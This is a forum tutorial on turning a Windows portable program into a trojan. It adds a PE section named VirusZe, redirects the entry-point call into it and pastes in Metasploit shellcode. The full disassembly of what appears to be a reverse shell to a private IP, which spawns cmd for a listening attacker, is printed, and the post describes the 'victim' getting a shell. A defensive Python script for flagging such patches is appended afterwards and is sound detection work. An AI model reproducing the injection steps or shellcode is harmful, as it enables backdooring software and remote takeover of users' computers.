09-29-2013, 08:28 PM
This tutorial is one example of how to insert additional code into a portable program on Windows. That code can be a virus, backdoor, trojan, etc. You will need:
1. XVI32 (Hex Editor)
2. LordPE
3. OLLYDBG
4. Metasploit
Note: all of the tools above can be found on the internet easily and free of charge (freeware).
Metasploit comes bundled with the BackTrack and Kali Linux operating systems.
Let's start.
I want to test injecting a portable piece of software that I got from my friends in Jogja. The tool is called XLNC.
The first step is to insert a new section header into the PE file. I use LordPE for this.
We get some information about the basic header of the file.
Click Sections to see all section headers in the XLNC PE file.
Add a section, then edit its name, VirtualSize and RawSize. Set VS and RS to 1000 each; that is enough room for simple malicious code.
As you can see, I named the new section VirusZe.
Save the file.
However, if you open the file now it turns out to produce an error.
OK, fix that with the hex editor.
Insert the hex string on the last row. Enter the information as shown above. Then save it.
OK, we've fixed that error.
When you open the PE file in Olly you are taken to the entry point, where the program's first instruction is executed.
Code:
00500534 > $ 55 PUSH EBP
00500535 . 8BEC MOV EBP,ESP
00500537 . 83C4 F0 ADD ESP,-10
0050053A . B8 AC005000 MOV EAX,XLNC.005000AC
0050053F E8 8465F0FF CALL XLNC.00406AC8
00500544 . A1 505E5000 MOV EAX,DWORD PTR DS:[505E50]
00500549 . 8B00 MOV EAX,DWORD PTR DS:[EAX]
0050054B . E8 CC38F6FF CALL XLNC.00463E1C
00500550 . A1 505E5000 MOV EAX,DWORD PTR DS:[505E50]
00500555 . 8B00 MOV EAX,DWORD PTR DS:[EAX]
00500557 . BA AC055000 MOV EDX,XLNC.005005AC ; ASCII "XLalu Nginjek v1.0"
0050055C . E8 B334F6FF CALL XLNC.00463A14
00500561 . 8B0D 8C5F5000 MOV ECX,DWORD PTR DS:[505F8C] ; XLNC.00508278
00500567 . A1 505E5000 MOV EAX,DWORD PTR DS:[505E50]
0050056C . 8B00 MOV EAX,DWORD PTR DS:[EAX]
0050056E . 8B15 D4FB4F00 MOV EDX,DWORD PTR DS:[4FFBD4] ; XLNC.004FFC20
00500574 . E8 BB38F6FF CALL XLNC.00463E34
00500579 . 8B0D D45F5000 MOV ECX,DWORD PTR DS:[505FD4] ; XLNC.00508270
0050057F . A1 505E5000 MOV EAX,DWORD PTR DS:[505E50]
00500584 . 8B00 MOV EAX,DWORD PTR DS:[EAX]
00500586 . 8B15 C8F94F00 MOV EDX,DWORD PTR DS:[4FF9C8] ; XLNC.004FFA14
0050058C . E8 A338F6FF CALL XLNC.00463E34
00500591 . A1 505E5000 MOV EAX,DWORD PTR DS:[505E50]
00500596 . 8B00 MOV EAX,DWORD PTR DS:[EAX]
00500598 . E8 1739F6FF CALL XLNC.00463EB4
0050059D . E8 9240F0FF CALL XLNC.00404634
005005A2 . 0000 ADD BYTE PTR DS:[EAX],AL
005005A4 . FFFFFFFF DD FFFFFFFF
005005A8 . 12000000 DD 00000012
005005AC . 58 4C 61 6C 75>ASCII "XLalu Nginjek v1"
005005BC . 2E 30 00 ASCII ".0",0
005005BF 00 DB 00
005005C0 00 DB 00
005005C1 00 DB 00
In the memory map we can already see the section header we just added.
Code:
Memory map
Address Size Owner Section Contains Type Access Initial Mapped as
00010000 00001000 Priv RW RW
00020000 00001000 Priv RW RW
0012B000 00001000 Priv RW Guar RW
0012C000 00004000 stack of mai Priv RW Guar RW
00130000 00003000 Map R R
00140000 00002000 Map R R
00150000 00006000 Priv RW RW
00250000 00006000 Priv RW RW
00260000 00003000 Map RW RW
00270000 00016000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\unicode.nls
00290000 00041000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\locale.nls
002E0000 00041000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\sortkey.nls
00330000 00006000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\sorttbls.nls
00340000 00001000 Priv RW RW
00350000 00001000 Priv RW RW
00360000 00004000 Priv RW RW
00370000 00003000 Map R R \Device\HarddiskVolume1\WINDOWS\system32\ctype.nls
00380000 00002000 Map R R
00390000 00002000 Map R R
00400000 00001000 XLNC PE header Imag R RWE
00401000 00100000 XLNC CODE code Imag R RWE
00501000 00006000 XLNC DATA data Imag R RWE
00507000 00002000 XLNC BSS Imag R RWE
00509000 00003000 XLNC .idata imports Imag R RWE
0050C000 00001000 XLNC .tls Imag R RWE
0050D000 00001000 XLNC .rdata Imag R RWE
0050E000 0000D000 XLNC .reloc relocations Imag R RWE
0051B000 00082000 XLNC .rsrc resources Imag R RWE
0059D000 00001000 XLNC .VirusZe Imag R RWE
005A0000 00003000 Map R E R E
00660000 00002000 Map R E R E
00670000 00103000 Map R R
00780000 0005D000 Map R E R E
77120000 00001000 oleaut32 PE header Imag R RWE
77121000 0007F000 oleaut32 .text code,imports Imag R RWE
771A0000 00001000 oleaut32 .orpc Imag R RWE
771A1000 00003000 oleaut32 .data data Imag R RWE
771A4000 00001000 oleaut32 .rsrc resources Imag R RWE
771A5000 00006000 oleaut32 .reloc relocations Imag R RWE
773D0000 00001000 comctl32 PE header Imag R RWE
773D1000 00091000 comctl32 .text code,imports Imag R RWE
77462000 00001000 comctl32 .data data Imag R RWE
77463000 0006A000 comctl32 .rsrc resources Imag R RWE
774CD000 00006000 comctl32 .reloc relocations Imag R RWE
774E0000 00001000 ole32 PE header Imag R RWE
774E1000 0011F000 ole32 .text code,imports Imag R RWE
77600000 00006000 ole32 .orpc code Imag R RWE
77606000 00007000 ole32 .data data Imag R RWE
7760D000 00002000 ole32 .rsrc resources Imag R RWE
7760F000 0000E000 ole32 .reloc relocations Imag R RWE
77C00000 00001000 version PE header Imag R RWE
77C01000 00004000 version .text code,imports Imag R RWE
77C05000 00001000 version .data data Imag R RWE
77C06000 00001000 version .rsrc resources Imag R RWE
77C07000 00001000 version .reloc relocations Imag R RWE
77C10000 00001000 msvcrt PE header Imag R RWE
77C11000 0004C000 msvcrt .text code,imports Imag R RWE
77C5D000 00007000 msvcrt .data data Imag R RWE
77C64000 00001000 msvcrt .rsrc resources Imag R RWE
77C65000 00003000 msvcrt .reloc relocations Imag R RWE
77DD0000 00001000 advapi32 PE header Imag R RWE
77DD1000 00075000 advapi32 .text code,imports Imag R RWE
77E46000 00005000 advapi32 .data data Imag R RWE
77E4B000 0001B000 advapi32 .rsrc resources Imag R RWE
77E66000 00005000 advapi32 .reloc relocations Imag R RWE
77E70000 00001000 RPCRT4 PE header Imag R RWE
77E71000 00083000 RPCRT4 .text code,imports Imag R RWE
77EF4000 00007000 RPCRT4 .orpc code Imag R RWE
77EFB000 00001000 RPCRT4 .data data Imag R RWE
77EFC000 00001000 RPCRT4 .rsrc resources Imag R RWE
77EFD000 00005000 RPCRT4 .reloc relocations Imag R RWE
77F10000 00001000 GDI32 PE header Imag R RWE
77F11000 00043000 GDI32 .text code,imports Imag R RWE
77F54000 00002000 GDI32 .data data Imag R RWE
77F56000 00001000 GDI32 .rsrc resources Imag R RWE
77F57000 00002000 GDI32 .reloc relocations Imag R RWE
77F60000 00001000 SHLWAPI PE header Imag R RWE
77F61000 0006C000 SHLWAPI .text code,imports Imag R RWE
77FCD000 00001000 SHLWAPI .data data Imag R RWE
77FCE000 00002000 SHLWAPI .rsrc resources Imag R RWE
77FD0000 00006000 SHLWAPI .reloc relocations Imag R RWE
77FE0000 00001000 Secur32 PE header Imag R RWE
77FE1000 0000D000 Secur32 .text code,imports Imag R RWE
77FEE000 00001000 Secur32 .data data Imag R RWE
77FEF000 00001000 Secur32 .rsrc resources Imag R RWE
77FF0000 00001000 Secur32 .reloc relocations Imag R RWE
7C800000 00001000 kernel32 PE header Imag R RWE
7C801000 00084000 kernel32 .text code,imports Imag R RWE
7C885000 00005000 kernel32 .data data Imag R RWE
7C88A000 00066000 kernel32 .rsrc resources Imag R RWE
7C8F0000 00006000 kernel32 .reloc relocations Imag R RWE
7C900000 00001000 ntdll PE header Imag R RWE
7C901000 0007A000 ntdll .text code,exports Imag R RWE
7C97B000 00005000 ntdll .data data Imag R RWE
7C980000 0002C000 ntdll .rsrc resources Imag R RWE
7C9AC000 00003000 ntdll .reloc relocations Imag R RWE
7C9C0000 00001000 shell32 PE header Imag R RWE
7C9C1000 001FE000 shell32 .text code,imports Imag R RWE
7CBBF000 0001D000 shell32 .data data Imag R RWE
7CBDC000 005E0000 shell32 .rsrc resources Imag R RWE
7D1BC000 0001B000 shell32 .reloc relocations Imag R RWE
7E410000 00001000 user32 PE header Imag R RWE
7E411000 00060000 user32 .text code,imports Imag R RWE
7E471000 00002000 user32 .data data Imag R RWE
7E473000 0002B000 user32 .rsrc resources Imag R RWE
7E49E000 00003000 user32 .reloc relocations Imag R RWE
7F6F0000 00007000 Map R E R E
7FFB0000 00024000 Map R R
7FFD9000 00001000 Priv RW RW
7FFDF000 00001000 data block o Priv RW RW
7FFE0000 00001000 Priv R R
The new section name VirusZe is visible in the memory map.
Details:
Code:
Memory map, item 28
Address=0059D000
Size=00001000 (4096.)
Owner=XLNC 00400000
Section=.VirusZe
Type=Imag 01001002
Access=R
Initial access=RWE
It is important to note that the static memory address of the new section is 0059D000.
Hmm, I'm interested in the first function call.
Code:
0050053F E8 8465F0FF CALL XLNC.00406AC8
We modify it into a JMP that redirects to memory 0059D000.
After that, use "Copy to executable" on the selection to save the change. Then save it. I saved it under the name XLNC-01.exe.
Open XLNC-01.exe in Olly again... notice:
Code:
00500534 > $ 55 PUSH EBP
00500535 . 8BEC MOV EBP,ESP
00500537 . 83C4 F0 ADD ESP,-10
0050053A . B8 AC005000 MOV EAX,XLNC-01.005000AC
0050053F .-E9 BCCA0900 JMP XLNC-01.0059D000
00500544 A1 DB A1
00500545 . 505E5000 DD XLNC-01.00505E50
00500549 8B DB 8B
0050054A . 00E8 ADD AL,CH
The modification so far has succeeded.
Code:
0050053F .-E9 BCCA0900 JMP XLNC-01.0059D000
OK, as you see, we have empty space to insert malicious code.
Then we must take it...
In the first two memory lines, enter PUSHAD & PUSHFD.
Code:
0059D000 60 PUSHAD
0059D001 9C PUSHFD
Create a payload through Metasploit... oh man, this is my favorite step...
Open the new shellcode with the hex editor.
Simply copy-paste that binary code into Olly...
OK, now you have the shellcode injected into XLNC.
Code:
0059D000 60 PUSHAD
0059D001 9C PUSHFD
0059D002 FC CLD
0059D003 E8 89000000 CALL XLNC-01.0059D091
0059D008 60 PUSHAD
0059D009 89E5 MOV EBP,ESP
0059D00B 31D2 XOR EDX,EDX
0059D00D 64:8B52 30 MOV EDX,DWORD PTR FS:[EDX+30]
0059D011 8B52 0C MOV EDX,DWORD PTR DS:[EDX+C]
0059D014 8B52 14 MOV EDX,DWORD PTR DS:[EDX+14]
0059D017 8B72 28 MOV ESI,DWORD PTR DS:[EDX+28]
0059D01A 0FB74A 26 MOVZX ECX,WORD PTR DS:[EDX+26]
0059D01E 31FF XOR EDI,EDI
0059D020 31C0 XOR EAX,EAX
0059D022 AC LODS BYTE PTR DS:[ESI]
0059D023 3C 61 CMP AL,61
0059D025 7C 02 JL SHORT XLNC-01.0059D029
0059D027 2C 20 SUB AL,20
0059D029 C1CF 0D ROR EDI,0D
0059D02C 01C7 ADD EDI,EAX
0059D02E ^E2 F0 LOOPD SHORT XLNC-01.0059D020
0059D030 52 PUSH EDX
0059D031 57 PUSH EDI
0059D032 8B52 10 MOV EDX,DWORD PTR DS:[EDX+10]
0059D035 8B42 3C MOV EAX,DWORD PTR DS:[EDX+3C]
0059D038 01D0 ADD EAX,EDX
0059D03A 8B40 78 MOV EAX,DWORD PTR DS:[EAX+78]
0059D03D 85C0 TEST EAX,EAX
0059D03F 74 4A JE SHORT XLNC-01.0059D08B
0059D041 01D0 ADD EAX,EDX
0059D043 50 PUSH EAX
0059D044 8B48 18 MOV ECX,DWORD PTR DS:[EAX+18]
0059D047 8B58 20 MOV EBX,DWORD PTR DS:[EAX+20]
0059D04A 01D3 ADD EBX,EDX
0059D04C E3 3C JECXZ SHORT XLNC-01.0059D08A
0059D04E 49 DEC ECX
0059D04F 8B348B MOV ESI,DWORD PTR DS:[EBX+ECX*4]
0059D052 01D6 ADD ESI,EDX
0059D054 31FF XOR EDI,EDI
0059D056 31C0 XOR EAX,EAX
0059D058 AC LODS BYTE PTR DS:[ESI]
0059D059 C1CF 0D ROR EDI,0D
0059D05C 01C7 ADD EDI,EAX
0059D05E 38E0 CMP AL,AH
0059D060 ^75 F4 JNZ SHORT XLNC-01.0059D056
0059D062 037D F8 ADD EDI,DWORD PTR SS:[EBP-8]
0059D065 3B7D 24 CMP EDI,DWORD PTR SS:[EBP+24]
0059D068 ^75 E2 JNZ SHORT XLNC-01.0059D04C
0059D06A 58 POP EAX
0059D06B 8B58 24 MOV EBX,DWORD PTR DS:[EAX+24]
0059D06E 01D3 ADD EBX,EDX
0059D070 66:8B0C4B MOV CX,WORD PTR DS:[EBX+ECX*2]
0059D074 8B58 1C MOV EBX,DWORD PTR DS:[EAX+1C]
0059D077 01D3 ADD EBX,EDX
0059D079 8B048B MOV EAX,DWORD PTR DS:[EBX+ECX*4]
0059D07C 01D0 ADD EAX,EDX
0059D07E 894424 24 MOV DWORD PTR SS:[ESP+24],EAX
0059D082 5B POP EBX
0059D083 5B POP EBX
0059D084 61 POPAD
0059D085 59 POP ECX
0059D086 5A POP EDX
0059D087 51 PUSH ECX
0059D088 FFE0 JMP EAX
0059D08A 58 POP EAX
0059D08B 5F POP EDI
0059D08C 5A POP EDX
0059D08D 8B12 MOV EDX,DWORD PTR DS:[EDX]
0059D08F ^EB 86 JMP SHORT XLNC-01.0059D017
0059D091 5D POP EBP
0059D092 68 33320000 PUSH 3233
0059D097 68 7773325F PUSH 5F327377
0059D09C 54 PUSH ESP
0059D09D 68 4C772607 PUSH 726774C
0059D0A2 FFD5 CALL EBP
0059D0A4 B8 90010000 MOV EAX,190
0059D0A9 29C4 SUB ESP,EAX
0059D0AB 54 PUSH ESP
0059D0AC 50 PUSH EAX
0059D0AD 68 29806B00 PUSH 6B8029
0059D0B2 FFD5 CALL EBP
0059D0B4 50 PUSH EAX
0059D0B5 50 PUSH EAX
0059D0B6 50 PUSH EAX
0059D0B7 50 PUSH EAX
0059D0B8 40 INC EAX
0059D0B9 50 PUSH EAX
0059D0BA 40 INC EAX
0059D0BB 50 PUSH EAX
0059D0BC 68 EA0FDFE0 PUSH E0DF0FEA
0059D0C1 FFD5 CALL EBP
0059D0C3 89C7 MOV EDI,EAX
0059D0C5 68 C0A80164 PUSH 6401A8C0
0059D0CA 68 020001BB PUSH BB010002
0059D0CF 89E6 MOV ESI,ESP
0059D0D1 6A 10 PUSH 10
0059D0D3 56 PUSH ESI
0059D0D4 57 PUSH EDI
0059D0D5 68 99A57461 PUSH 6174A599
0059D0DA FFD5 CALL EBP
0059D0DC 68 636D6400 PUSH 646D63
0059D0E1 89E3 MOV EBX,ESP
0059D0E3 57 PUSH EDI
0059D0E4 57 PUSH EDI
0059D0E5 57 PUSH EDI
0059D0E6 31F6 XOR ESI,ESI
0059D0E8 6A 12 PUSH 12
0059D0EA 59 POP ECX
0059D0EB 56 PUSH ESI
0059D0EC ^E2 FD LOOPD SHORT XLNC-01.0059D0EB
0059D0EE 66:C74424 3C 010>MOV WORD PTR SS:[ESP+3C],101
0059D0F5 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
0059D0F9 C600 44 MOV BYTE PTR DS:[EAX],44
0059D0FC 54 PUSH ESP
0059D0FD 50 PUSH EAX
0059D0FE 56 PUSH ESI
0059D0FF 56 PUSH ESI
0059D100 56 PUSH ESI
0059D101 46 INC ESI
0059D102 56 PUSH ESI
0059D103 4E DEC ESI
0059D104 56 PUSH ESI
0059D105 56 PUSH ESI
0059D106 53 PUSH EBX
0059D107 56 PUSH ESI
0059D108 68 79CC3F86 PUSH 863FCC79
0059D10D FFD5 CALL EBP
0059D10F 89E0 MOV EAX,ESP
0059D111 4E DEC ESI
0059D112 56 PUSH ESI
0059D113 46 INC ESI
0059D114 FF30 PUSH DWORD PTR DS:[EAX]
0059D116 68 08871D60 PUSH 601D8708
0059D11B FFD5 CALL EBP
0059D11D BB F0B5A256 MOV EBX,56A2B5F0
0059D122 BB 4713726F MOV EBX,6F721347
0059D127 6A 00 PUSH 0
0059D129 53 PUSH EBX
0059D12A FFD5 CALL EBP
0059D12C 0000 ADD BYTE PTR DS:[EAX],AL
0059D12E 013A ADD DWORD PTR DS:[EDX],EDI
0059D130 0000 ADD BYTE PTR DS:[EAX],AL
0059D132 0000 ADD BYTE PTR DS:[EAX],AL
Save it... I saved it as XLNC-02.exe.
I start a listener on the port that matches the shellcode...
When the victim runs the file, a shell is created.
Setting a breakpoint on the section will be continued in part II... TO BE CONTINUED
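A defender's counterpart to the steps above, added here and not part of the original post: a small PE section-table parser that flags the artifacts this kind of patch leaves behind (a writable and executable section, an unfamiliar section name, and a JMP near the entry point whose target lies in a different section). The sample image is constructed inline to mirror the patched XLNC-01.exe and is not the real binary; the 64-byte E9 scan is a heuristic, not a disassembler.

```python
import struct
EXECUTE, WRITE = 0x20000000, 0x80000000   # IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE
KNOWN = {b"CODE", b"DATA", b"BSS", b".text", b".data", b".rdata", b".idata", b".bss", b".tls", b".reloc", b".rsrc"}

def parse(pe):
    """Return (entry_rva, sections) of a PE32 image; a section is (name, vsize, vaddr, rawsize, rawptr, chars)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)   # COFF file header
    entry = struct.unpack_from("<I", pe, e_lfanew + 40)[0]       # OptionalHeader.AddressOfEntryPoint
    base = e_lfanew + 24 + opt_size                               # first IMAGE_SECTION_HEADER
    secs = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", pe, base + 40 * i)
        secs.append((f[0].rstrip(b"\0"), f[1], f[2], f[3], f[4], f[9]))
    return entry, secs

def triage(pe):
    """Triage leads: RWE sections, unfamiliar section names, and a JMP near the entry point that leaves its section."""
    entry, secs = parse(pe)
    owner = lambda rva: next((s for s in secs if s[2] <= rva < s[2] + max(s[1], s[3])), None)
    label = lambda s: s[0].decode(errors="replace") if s else "unmapped memory"
    out = []
    for s in secs:
        if s[5] & EXECUTE and s[5] & WRITE:
            out.append(f"section {label(s)} is writable and executable")
        if s[0] not in KNOWN:
            out.append(f"unusual section name {label(s)}")
    ep = owner(entry)
    if ep is None:
        return out + ["entry point maps to no section"]
    off = ep[4] + (entry - ep[2])                                 # file offset of the entry code
    for j in range(min(64, len(pe) - off - 5)):  # byte scan, not a disassembly: treat hits as leads
        if pe[off + j] == 0xE9:                                  # E9 rel32 = JMP near
            target = entry + j + 5 + struct.unpack_from("<i", pe, off + j + 1)[0]
            if (dst := owner(target)) is not ep:
                out.append(f"JMP at EP+{j:#x} to RVA {target:#x} leaves {label(ep)} for {label(dst)}")
    return out

def build_sample():
    """Constructed stand-in for the patched XLNC-01.exe (not the real binary): CODE jumps into an appended RWE .VirusZe."""
    def sec(name, vsize, vaddr, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)
    opt = bytearray(0xE0)                                         # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                         # Magic = PE32
    struct.pack_into("<I", opt, 16, 0x1000)                       # AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)   # i386, 2 sections, EXE
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x80)             # e_lfanew = 0x80
    headers = (dos.ljust(0x80, b"\0") + b"PE\0\0" + coff + bytes(opt)
               + sec(b"CODE", 0x1000, 0x1000, 0x200, 0x200, 0x60000020)        # code|exec|read
               + sec(b".VirusZe", 0x1000, 0x2000, 0x200, 0x400, 0xE0000020))   # code|exec|read|write
    # PUSH EBP; MOV EBP,ESP; ADD ESP,-10; MOV EAX,5000AC; JMP +0xFF0 (lands at RVA 0x2000)
    code = bytes.fromhex("558bec83c4f0b8ac005000e9f00f0000")
    return headers.ljust(0x200, b"\0") + code.ljust(0x200, b"\0") + bytes(0x200)
```

Run `triage()` over any PE you are reviewing; on the constructed sample it reports the RWE section, the unfamiliar name and the redirect from CODE into .VirusZe.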
FOLLOW @DutaLinux
for more questions and sharing about security and open source only